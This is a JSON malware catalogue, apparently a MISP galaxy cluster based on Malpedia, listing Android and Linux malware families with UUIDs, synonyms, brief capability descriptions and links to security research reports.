{ "authors": [ "Davide Arcuri", "Alexandre Dulaunoy", "Steffen Enders", "Andrea Garavaglia", "Andras Iklody", "Daniel Plohmann", "Christophe Vandeplas" ], "category": "tool", "description": "Malware galaxy cluster based on Malpedia.", "name": "Malpedia", "source": "Malpedia", "type": "malpedia", "uuid": "5fc98d08-90a4-498a-ad2e-0edf50ef374e", "values": [ { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.adultswine", "https://research.checkpoint.com/malware-displaying-porn-ads-discovered-in-game-apps-on-google-play/" ], "synonyms": [], "type": [] }, "uuid": "824f284b-b38b-4a57-9e4a-aee4061a5b2d", "value": "AdultSwine" }, { "description": "Androrat is a remote administration tool developed in Java Android for the client side and in Java/Swing for the Server. The name Androrat is a mix of Android and RAT (Remote Access Tool). It has been developed in a team of 4 for a university project. The goal of the application is to give the control of the android system remotely and retrieve informations from it.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.androrat", "https://github.com/DesignativeDave/androrat", "https://hotforsecurity.bitdefender.com/blog/possibly-italy-born-android-rat-reported-in-china-find-bitdefender-researchers-16264.html", "https://www.kaspersky.com/blog/mobile-malware-part-4/24290/", "https://blog.trendmicro.com/trendlabs-security-intelligence/the-urpage-connection-to-bahamut-confucius-and-patchwork/" ], "synonyms": [], "type": [] }, "uuid": "80447111-8085-40a4-a052-420926091ac6", "value": "AndroRAT" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.anubisspy", "https://documents.trendmicro.com/assets/tech-brief-cyberespionage-campaign-sphinx-goes-mobile-with-anubisspy.pdf", "http://blog.trendmicro.com/trendlabs-security-intelligence/cyberespionage-campaign-sphinx-goes-mobile-anubisspy/" ], "synonyms": [], "type": [] }, "uuid": "06ffb614-33ca-4b04-bf3b-623e68754184", "value": "AnubisSpy" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.asacub", "https://securelist.com/the-rise-of-mobile-banker-asacub/87591/" ], "synonyms": [], "type": [] }, "uuid": "dffa06ec-e94f-4fd7-8578-2a98aace5473", "value": "Asacub" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.bahamut", "https://www.bellingcat.com/news/mena/2017/06/12/bahamut-pursuing-cyber-espionage-actor-middle-east/", "https://www.bellingcat.com/resources/case-studies/2017/10/27/bahamut-revisited-cyber-espionage-middle-east-south-asia/", "https://blog.trendmicro.com/trendlabs-security-intelligence/the-urpage-connection-to-bahamut-confucius-and-patchwork/" ], "synonyms": [], "type": [] }, "uuid": "4038c3bc-b559-45bb-bac1-9665a54dedf9", "value": "Bahamut (Android)" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.bankbot", "https://securityintelligence.com/after-big-takedown-efforts-20-more-bankbot-mobile-malware-apps-make-it-into-google-play/", "https://www.welivesecurity.com/2017/11/21/new-campaigns-spread-banking-malware-google-play/", "http://b0n1.blogspot.de/2017/05/tracking-android-bankbot.html", "http://blog.koodous.com/2017/04/decrypting-bankbot-communications.html", "http://blog.koodous.com/2017/05/bankbot-on-google-play.html" ], "synonyms": [], "type": [] }, "uuid": "85975621-5126-40cb-8083-55cbfa75121b", "value": "BankBot" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.bianlian", "https://www.threatfabric.com/blogs/bianlian_from_rags_to_riches_the_malware_dropper_that_had_a_dream.html" ], "synonyms": [], "type": [] }, "uuid": "1faaa5c5-ab4e-4101-b2d9-0e12207d70fc", "value": "BianLian" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.busygasper", "https://securelist.com/busygasper-the-unfriendly-spy/87627/" ], "synonyms": [], "type": [] }, "uuid": "4bf68bf8-08e5-46f3-ade5-0bd4f124b168", "value": "BusyGasper" }, { "description": "Catelites Bot (identified by Avast and SfyLabs in December 2017) is an Android trojan, with ties to CronBot. Once the malicious app is installed, attackers use social engineering tricks and window overlays to get credit card details from the victim.\r\nThe distribution vector seems to be fake apps from third-party app stores (not Google Play) or via malvertisement. After installation and activation, the app creates fake Gmail, Google Play and Chrome icons. Furthermore, the malware sends a fake system notification, telling the victim that they need to re-authenticate with Google Services and ask for their credit card details to be entered.\r\nCurrently the malware has overlays for over 2,200 apps of banks and financial institutions.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.catelites", "https://blog.avast.com/new-version-of-mobile-malware-catelites-possibly-linked-to-cron-cyber-gang", "https://www.youtube.com/watch?v=1LOy0ZyjEOk" ], "synonyms": [], "type": [] }, "uuid": "2c672b27-bc65-48ba-ba3d-6318473e78b6", "value": "Catelites" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.charger", "http://blog.checkpoint.com/2017/01/24/charger-malware/", "http://blog.joesecurity.org/2017/01/deep-analysis-of-android-ransom-charger.html" ], "synonyms": [], "type": [] }, "uuid": "6e0545df-8df6-4990-971c-e96c4c60d561", "value": "Charger" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.chrysaor", "https://info.lookout.com/rs/051-ESQ-475/images/lookout-pegasus-android-technical-analysis.pdf", "https://android-developers.googleblog.com/2017/04/an-investigation-of-chrysaor-malware-on.html", "https://media.ccc.de/v/33c3-7901-pegasus_internals", "https://citizenlab.ca/2018/09/hide-and-seek-tracking-nso-groups-pegasus-spyware-to-operations-in-45-countries/", "https://security.googleblog.com/2017/04/an-investigation-of-chrysaor-malware-on.html" ], "synonyms": [ "JigglyPuff", "Pegasus" ], "type": [] }, "uuid": "52acea22-7d88-433c-99e6-8fef1657e3ad", "value": "Chrysaor" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.clientor", "https://twitter.com/LukasStefanko/status/1042297855602503681" ], "synonyms": [], "type": [] }, "uuid": "c0a48ca3-682d-45bc-805c-e62aecd4c724", "value": "Clientor" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.connic", "https://www.welivesecurity.com/2017/12/11/banking-malware-targets-polish-banks/" ], "synonyms": [ "SpyBanker" ], "type": [] }, "uuid": "93b1c63a-4a34-44fd-805b-0a3470ff7e6a", "value": "Connic" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.cpuminer", "https://blog.trendmicro.com/trendlabs-security-intelligence/coin-miner-mobile-malware-returns-hits-google-play/" ], "synonyms": [], "type": [] }, "uuid": "8a42a699-1746-498b-a558-e7113bb916c0", "value": "Cpuminer (Android)" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.doublelocker", "https://www.welivesecurity.com/2017/10/13/doublelocker-innovative-android-malware/" ], "synonyms": [], "type": [] }, "uuid": "10d0115a-00b4-414e-972b-8320a2bb873c", "value": "DoubleLocker" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.dualtoy", "http://researchcenter.paloaltonetworks.com/2016/09/dualtoy-new-windows-trojan-sideloads-risky-apps-to-android-and-ios-devices/" ], "synonyms": [], "type": [] }, "uuid": "8269e779-db23-4c94-aafb-36ee94879417", "value": "DualToy (Android)" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.dvmap", "https://securelist.com/dvmap-the-first-android-malware-with-code-injection/78648/" ], "synonyms": [], "type": [] }, "uuid": "e5de818e-d25d-47a8-ab31-55fc992bf91b", "value": "Dvmap" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.exobot", "https://securityintelligence.com/ibm-x-force-delves-into-exobots-leaked-source-code/" ], "synonyms": [], "type": [] }, "uuid": "c9f2b058-6c22-462a-a20a-fca933a597dd", "value": "ExoBot" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.faketgram", "https://blog.talosintelligence.com/2018/11/persian-stalker.html" ], "synonyms": [ "FakeTGram" ], "type": [] }, "uuid": "6c0fc7e4-4629-494f-b471-f7a8cc47c0e0", "value": "FakeGram" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.flexispy", "https://www.randhome.io/blog/2017/04/23/lets-talk-about-flexispy/" ], "synonyms": [], "type": [] }, "uuid": "4305d59a-0d07-4021-a902-e7996378898b", "value": "FlexiSpy (Android)" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.flexnet", "https://twitter.com/LukasStefanko/status/886849558143279104" ], "synonyms": [ "gugi" ], "type": [] }, "uuid": "80d7d229-b3a7-4205-8304-f7b18bda129f", "value": "FlexNet" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.ghostctrl", "https://blog.trendmicro.com/trendlabs-security-intelligence/android-backdoor-ghostctrl-can-silently-record-your-audio-video-and-more/" ], "synonyms": [], "type": [] }, "uuid": "3b6c1771-6d20-4177-8be0-12116e254bf5", "value": "GhostCtrl" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.glancelove", "https://www.haaretz.com/israel-news/hamas-cyber-ops-spied-on-israeli-soldiers-using-fake-world-cup-app-1.6241773", "https://www.ci-project.org/blog/2017/3/4/arid-viper", "https://securelist.com/breaking-the-weakest-link-of-the-strongest-chain/77562/", "https://www.idf.il/en/minisites/hamas/hamas-uses-fake-facebook-profiles-to-target-israeli-soldiers/", "https://www.clearskysec.com/glancelove/" ], "synonyms": [], "type": [] }, "uuid": "24a709ef-c2e4-45ca-90b6-dfa184472f49", "value": "GlanceLove" }, { "description": "Cisco Talos identifies GPlayed as a malware written in .NET using the Xamarin environment for mobile applications. It is considered powerful because of its capability to adapt after its deployment. In order to achieve this adaptability, the operator has the capability to remotely load plugins, inject scripts and even compile new .NET code that can be executed. ", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.gplayed", "https://blog.talosintelligence.com/2018/10/gplayedtrojan.html", "https://blog.talosintelligence.com/2018/10/gplayerbanker.html" ], "synonyms": [], "type": [] }, "uuid": "13dc1ec7-aba7-4553-b990-8323405a1d32", "value": "GPlayed" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.hero_rat", "https://www.welivesecurity.com/2018/06/18/new-telegram-abusing-android-rat/" ], "synonyms": [], "type": [] }, "uuid": "537f17ac-74e5-440b-8659-d4fdb4af41a6", "value": "HeroRAT" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.irrat", "https://researchcenter.paloaltonetworks.com/2018/03/unit42-telerat-another-android-trojan-leveraging-telegrams-bot-api-to-target-iranian-users/" ], "synonyms": [], "type": [] }, "uuid": "3e7c6e8c-46fc-4498-a28d-5b3d144c51cf", "value": "IRRat" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.jaderat", "https://blog.lookout.com/mobile-threat-jaderat" ], "synonyms": [], "type": [] }, "uuid": "8804e02c-a139-4c3d-8901-03302ca1faa0", "value": "JadeRAT" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.kevdroid", "https://researchcenter.paloaltonetworks.com/2018/04/unit42-reaper-groups-updated-mobile-arsenal/", "https://blog.talosintelligence.com/2018/04/fake-av-investigation-unearths-kevdroid.html" ], "synonyms": [], "type": [] }, "uuid": "1e1924b5-89cb-408b-bcee-d6aaef7b24e0", "value": "KevDroid" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.koler", "https://twitter.com/LukasStefanko/status/928262059875213312" ], "synonyms": [], "type": [] }, "uuid": "4ff34778-de4b-4f48-9184-4975c8ccc3f3", "value": "Koler" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.lazarus", "https://securingtomorrow.mcafee.com/mcafee-labs/android-malware-appears-linked-to-lazarus-cybercrime-group/" ], "synonyms": [], "type": [] }, "uuid": "0caf0292-b01a-4439-b56f-c75b71900bc0", "value": "Lazarus (Android)" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.lazarus_elf", "https://securingtomorrow.mcafee.com/mcafee-labs/android-malware-appears-linked-to-lazarus-cybercrime-group/#sf174581990" ], "synonyms": [], "type": [] }, "uuid": "fe6134aa-6588-4619-8447-57a44eb8b24c", "value": "Lazarus ELF Backdoor" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.loki", "http://blog.checkpoint.com/2017/03/10/preinstalled-malware-targeting-mobile-users/" ], "synonyms": [], "type": [] }, "uuid": "a6f481fe-b6db-4507-bb3c-28f10d800e2f", "value": "Loki" }, { "description": "Android banker Trojan with the standard banking capabilities such as overlays, SMS stealing. It also features ransomware functionality. Note, the network traffic is obfuscated the same way as in Android Bankbot.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.lokibot", "https://www.threatfabric.com/blogs/lokibot_the_first_hybrid_android_malware.html" ], "synonyms": [], "type": [] }, "uuid": "4793a29b-1191-4750-810e-9301a6576fc4", "value": "LokiBot" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.marcher", "https://www.zscaler.de/blogs/research/android-marcher-continuously-evolving-mobile-malware", "https://www.clientsidedetection.com/marcher.html", "https://www.clientsidedetection.com/exobot_v2_update___staying_ahead_of_the_competition.html" ], "synonyms": [ "ExoBot" ], "type": [] }, "uuid": "f691663a-b360-4c0d-a4ee-e9203139c38e", "value": "Marcher" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.mazarbot", "https://b0n1.blogspot.de/2017/08/phishing-attack-at-raiffeisen-bank-by.html", "https://heimdalsecurity.com/blog/security-alert-mazar-bot-active-attacks-android-malware/" ], "synonyms": [], "type": [] }, "uuid": "38cbdc29-a5af-46ae-ab82-baf3f6999826", "value": "MazarBot" }, { "description": "MysteryBot is an Android banking Trojan with overlay capabilities with support for Android 7/8 but also provides other features such as key logging and ransomware functionality.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.mysterybot", "https://www.threatfabric.com/blogs/mysterybot__a_new_android_banking_trojan_ready_for_android_7_and_8.html" ], "synonyms": [], "type": [] }, "uuid": "0a53ace4-98ae-442f-be64-b8e373948bde", "value": "MysteryBot" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.omnirat", "https://securityintelligence.com/news/omnirat-takes-over-android-devices-through-social-engineering-tricks/", "https://blog.avast.com/2015/11/05/droidjack-isnt-the-only-spying-software-out-there-avast-discovers-that-omnirat-is-currently-being-used-and-spread-by-criminals-to-gain-full-remote-co" ], "synonyms": [], "type": [] }, "uuid": "ec936d58-6607-4e33-aa97-0e587bbbdda5", "value": "OmniRAT" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.podec", "https://securelist.com/jack-of-all-trades/83470/" ], "synonyms": [], "type": [] }, "uuid": "82f9c4c1-2619-4236-a701-776c6c781f45", "value": "Podec" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.popr-d30", "http://blog.crysys.hu/2017/01/technical-details-on-the-fancy-bear-android-malware-poprd30-apk/", "http://blog.crysys.hu/2017/03/update-on-the-fancy-bear-android-malware-poprd30-apk/" ], "synonyms": [ "Popr-d30" ], "type": [] }, "uuid": "0a7d9d22-a26d-4a2b-ab9b-b296176c3ecf", "value": "X-Agent (Android)" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.pornhub" ], "synonyms": [], "type": [] }, "uuid": "3272a8d8-8323-4e98-b6ce-cb40789a3616", "value": "Fake Pornhub" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.raxir", "https://twitter.com/PhysicalDrive0/statuses/798825019316916224" ], "synonyms": [], "type": [] }, "uuid": "f5cabe73-b5d6-4503-8350-30a6d54c32ef", "value": "Raxir" }, { "description": "RedAlert 2 is an new Android malware used by an attacker to gain access to login credentials of various e-banking apps. The malware works by overlaying a login screen with a fake display that sends the credentials to a C2 server.\r\nThe malware also has the ability to block incoming calls from banks, to prevent the victim of being notified.\r\nAs a distribution vector RedAlert 2 uses third-party app stores and imitates real Android apps like Viber, Whatsapp or fake Adobe Flash Player updates.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.redalert2", "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/red-alert-2-0-android-trojan-spreads-via-third-party-app-stores", "https://clientsidedetection.com/new_android_trojan_targeting_over_60_banks_and_social_apps.html" ], "synonyms": [], "type": [] }, "uuid": "e9aaab46-abb1-4390-b37b-d0457d05b28f", "value": "RedAlert2" }, { "description": "The Android app using for Retefe is a SMS stealer, used to forward mTAN codes to the threat actor. Further is a bank logo added to the specific Android app to trick users into thinking this is a legitimate app. Moreover, if the victim is not a real victim, the link to download the APK is not the malicious APK, but the real 'Signal Private Messenger' tool, hence the victim's phone doesn't get infected.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.retefe", "http://blog.angelalonso.es/2015/10/reversing-c2c-http-emmental.html", "https://www.govcert.admin.ch/blog/33/the-retefe-saga", "http://blog.angelalonso.es/2017/02/hunting-retefe-with-splunk-some24.html", "http://maldr0id.blogspot.ch/2014/09/android-malware-based-on-sms-encryption.html", "http://blog.angelalonso.es/2015/11/reversing-sms-c-protocol-of-emmental.html", "http://blog.dornea.nu/2014/07/07/disect-android-apks-like-a-pro-static-code-analysis/" ], "synonyms": [], "type": [] }, "uuid": "22ef1e56-7778-41d1-9b2b-737aa5bf9777", "value": "Retefe (Android)" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.roaming_mantis", "https://securelist.com/roaming-mantis-dabbles-in-mining-and-phishing-multilingually/85607/", "https://securelist.com/roaming-mantis-uses-dns-hijacking-to-infect-android-smartphones/85178/" ], "synonyms": [], "type": [] }, "uuid": "31d2ce1f-44bf-4738-a41d-ddb43466cd82", "value": "Roaming Mantis" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.rootnik", "https://blog.fortinet.com/2017/01/24/deep-analysis-of-android-rootnik-malware-using-advanced-anti-debug-and-anti-hook-part-i-debugging-in-the-scope-of-native-layer", "https://blog.fortinet.com/2017/01/26/deep-analysis-of-android-rootnik-malware-using-advanced-anti-debug-and-anti-hook-part-ii-analysis-of-the-scope-of-java" ], "synonyms": [], "type": [] }, "uuid": "db3dcfd1-79d2-4c91-898f-5f2463d7c417", "value": "Rootnik" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.skygofree", "https://securelist.com/skygofree-following-in-the-footsteps-of-hackingteam/83603/", "https://cdn.securelist.com/files/2018/01/Skygofree_appendix_eng.pdf" ], "synonyms": [], "type": [] }, "uuid": "f5fded3c-8f45-471a-a372-d8be101e1b22", "value": "Skygofree" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.slempo", "https://www.fireeye.com/blog/threat-research/2015/12/slembunk_an_evolvin.html", "https://www.pcworld.com/article/3035725/source-code-for-powerful-android-banking-malware-is-leaked.html" ], "synonyms": [ "SlemBunk" ], "type": [] }, "uuid": "d87e2574-7b9c-4ea7-98eb-88f3e139f6ff", "value": "Slempo" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.slocker", "https://blog.trendmicro.com/trendlabs-security-intelligence/slocker-mobile-ransomware-starts-mimicking-wannacry/" ], "synonyms": [], "type": [] }, "uuid": "fe187c8a-25d4-4d30-bd43-efca18d527f0", "value": "Slocker" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.smsspy" ], "synonyms": [], "type": [] }, "uuid": "7a38c552-0e1a-4980-8d62-1aa38617efab", "value": "SMSspy" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.spybanker", "https://news.drweb.com/show/?i=11104&lng=en", "http://www.welivesecurity.com/2017/02/23/released-android-malware-source-code-used-run-banking-botnet/" ], "synonyms": [], "type": [] }, "uuid": "e186384b-8001-4cdd-b170-1548deb8bf04", "value": "SpyBanker" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.spynote", "https://docs.google.com/document/d/1oYX3uN6KxIX_StzTH0s0yFNNoHDnV8VgmVqU5WoeErc/edit#heading=h.hcd1wvpsrgfr" ], "synonyms": [], "type": [] }, "uuid": "31592c69-d540-4617-8253-71ae0c45526c", "value": "SpyNote" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.stealthagent", "https://www.amnesty.org/download/Documents/ASA3383662018ENGLISH.PDF" ], "synonyms": [], "type": [] }, "uuid": "0777cb30-534f-44bb-a7af-906a422bd624", "value": "StealthAgent" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.stealthmango", "https://www.lookout.com/info/stealth-mango-report-ty" ], "synonyms": [], "type": [] }, "uuid": "7d480f11-3de8-463d-8a19-54685c8b9e0f", "value": "Stealth Mango" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.svpeng", "https://securelist.com/a-new-era-in-mobile-banking-trojans/79198/" ], "synonyms": [], "type": [] }, "uuid": "d99c0a47-9d61-4d92-86ec-86a87b060d76", "value": "Svpeng" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.switcher", "https://securelist.com/blog/mobile/76969/switcher-android-joins-the-attack-the-router-club/" ], "synonyms": [], "type": [] }, "uuid": "e3e90666-bc19-4741-aca8-1e4cbc2f4c9e", "value": "Switcher" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.telerat", "https://researchcenter.paloaltonetworks.com/2018/03/unit42-telerat-another-android-trojan-leveraging-telegrams-bot-api-to-target-iranian-users/" ], "synonyms": [], "type": [] }, "uuid": "e1600d04-d2f7-4862-8bbc-0f038ea683ea", "value": "TeleRAT" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.tempting_cedar", "https://blog.avast.com/avast-tracks-down-tempting-cedar-spyware" ], "synonyms": [], "type": [] }, "uuid": "982c3554-1df2-4062-8f32-f311940ad9ff", "value": "TemptingCedar Spyware" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.tinyz", "http://blog.group-ib.com/cron" ], "synonyms": [ "Catelites Android Bot", "MarsElite Android Bot" ], "type": [] }, "uuid": "93b27a50-f9b7-4ab6-bb9f-70a4b914eec3", "value": "TinyZ" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.titan", "https://blog.lookout.com/titan-mobile-threat", "https://www.alienvault.com/blogs/labs-research/delivery-keyboy" ], "synonyms": [], "type": [] }, "uuid": "7d418da3-d9d2-4005-8cc7-7677d1b11327", "value": "Titan" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.triada", "https://www.nowsecure.com/blog/2016/11/21/android-malware-analysis-radare-triada-trojan/", "https://blog.checkpoint.com/2016/06/17/in-the-wild-mobile-malware-implements-new-features/", "https://securelist.com/everyone-sees-not-what-they-want-to-see/74997/", "https://securelist.com/attack-on-zygote-a-new-twist-in-the-evolution-of-mobile-threats/74032/", "http://contagiominidump.blogspot.de/2016/07/android-triada-modular-trojan.html" ], "synonyms": [], "type": [] }, "uuid": "fa5fdfd2-8142-43f5-9b48-d1033b5398c8", "value": "Triada" }, { "description": "Bitdefender described Triout as a Android spyware, which appears to act as a framework for building extensive surveillance capabilities into seemingly benign applications. Found bundled with a repackaged app, the spyware’s surveillance capabilities involve hiding its presence on the device, recording phone calls, logging incoming text messages, recoding videos, taking pictures and collecting GPS coordinates, then broadcasting all of that to an attacker-controlled C&C (command and control) server.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.triout", "https://labs.bitdefender.com/wp-content/uploads/downloads/triout-the-malware-framework-for-android-that-packs-potent-spyware-capabilities/" ], "synonyms": [], "type": [] }, "uuid": "bd9ce51c-53f9-411b-b46a-aba036c433b1", "value": "Triout" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.unidentified_001", "https://twitter.com/illegalFawn/status/826775250583035904" ], "synonyms": [], "type": [] }, "uuid": "bbd5a32e-a080-4f16-98ea-ad8863507aa6", "value": "Unidentified APK 001" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.unidentified_002" ], "synonyms": [], "type": [] }, "uuid": "afb6a7cc-4185-4f19-8ad4-45dcbb76e544", "value": "Unidentified APK 002" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.viper_rat", "https://securelist.com/blog/incidents/77562/breaking-the-weakest-link-of-the-strongest-chain/", "https://blog.lookout.com/blog/2017/02/16/viperrat-mobile-apt/" ], "synonyms": [], "type": [] }, "uuid": "3482f5fe-f129-4c77-ae98-76e25f6086b9", "value": "Viper RAT" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.wirex", "https://krebsonsecurity.com/2017/08/tech-firms-team-up-to-take-down-wirex-android-ddos-botnet/", "https://www.flashpoint-intel.com/blog/wirex-botnet-industry-collaboration/" ], "synonyms": [], "type": [] }, "uuid": "77f2254c-9886-4eed-a7c3-bbcef4a97d46", "value": "WireX" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.xbot", "https://blog.avast.com/2015/02/17/angry-android-hacker-hides-xbot-malware-in-popular-application-icons/", "https://researchcenter.paloaltonetworks.com/2016/02/new-android-trojan-xbot-phishes-credit-cards-and-bank-accounts-encrypts-devices-for-ransom/" ], "synonyms": [], "type": [] }, "uuid": "4cfa42a3-71d9-43e2-bf23-daa79f326387", "value": "Xbot" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.xrat", "https://blog.lookout.com/xrat-mobile-threat" ], "synonyms": [], "type": [] }, "uuid": "a8f167a8-30b9-4953-8eb6-247f0d046d32", "value": "XRat" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.zoopark", "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/03114450/ZooPark_for_public_final_edit.pdf", "https://securelist.com/whos-who-in-the-zoo/85394" ], "synonyms": [], "type": [] }, "uuid": "b1fc66de-fda7-4f0c-af00-751d334444b3", "value": "ZooPark" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.ztorg", "http://blog.fortinet.com/2017/03/08/teardown-of-android-ztorg-part-2", "https://blog.fortinet.com/2017/03/15/teardown-of-a-recent-variant-of-android-ztorg-part-1", "https://securelist.com/ztorg-from-rooting-to-sms/78775/" ], "synonyms": [ "Qysly" ], "type": [] }, "uuid": "9fbf97c0-d87a-47b0-a511-0147a58b5202", "value": "Ztorg" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.backdoor_irc16", "https://news.drweb.com/show/?c=5&i=10193&lng=en" ], "synonyms": [], "type": [] }, "uuid": "3008fa01-492a-42e2-ab9b-a0a9d12823b8", "value": "Irc16" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.bashlite", "http://blog.trendmicro.com/trendlabs-security-intelligence/bashlite-affects-devices-running-on-busybox/", "https://honeynet.org/sites/default/files/Bots_Keep_Talking_To_Us.pdf", "https://krebsonsecurity.com/2016/09/krebsonsecurity-hit-with-record-ddos/" ], "synonyms": [ "Gafgyt", "gayfgt", "lizkebab", "qbot", "torlus" ], "type": [] }, "uuid": "81917a93-6a70-4334-afe2-56904c1fafe9", "value": "Bashlite" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.bcmpupnp_hunter", "https://blog.netlab.360.com/bcmpupnp_hunter-a-100k-botnet-turns-home-routers-to-email-spammers-en/" ], "synonyms": [], "type": [] }, "uuid": "d8dd47a5-85fe-4f07-89dc-00301468d209", "value": "BCMPUPnP_Hunter" }, { "description": "This is in the same family as eBury, Calfbot, and is also likely related to DarkLeech", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.cdorked", "https://www.welivesecurity.com/2013/04/26/linuxcdorked-new-apache-backdoor-in-the-wild-serves-blackhole/", "https://blog.sucuri.net/2014/03/windigo-linux-analysis-ebury-and-cdorked.html", "https://www.symantec.com/security-center/writeup/2013-050214-5501-99", "https://www.welivesecurity.com/2013/05/02/the-stealthiness-of-linuxcdorked-a-clarification/", "https://blogs.cisco.com/security/linuxcdorked-faqs" ], "synonyms": [ "CDorked.A" ], "type": [] }, "uuid": "bb9eaaec-97c9-4014-94dd-129cecf31ff0", "value": "CDorked" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.chapro", 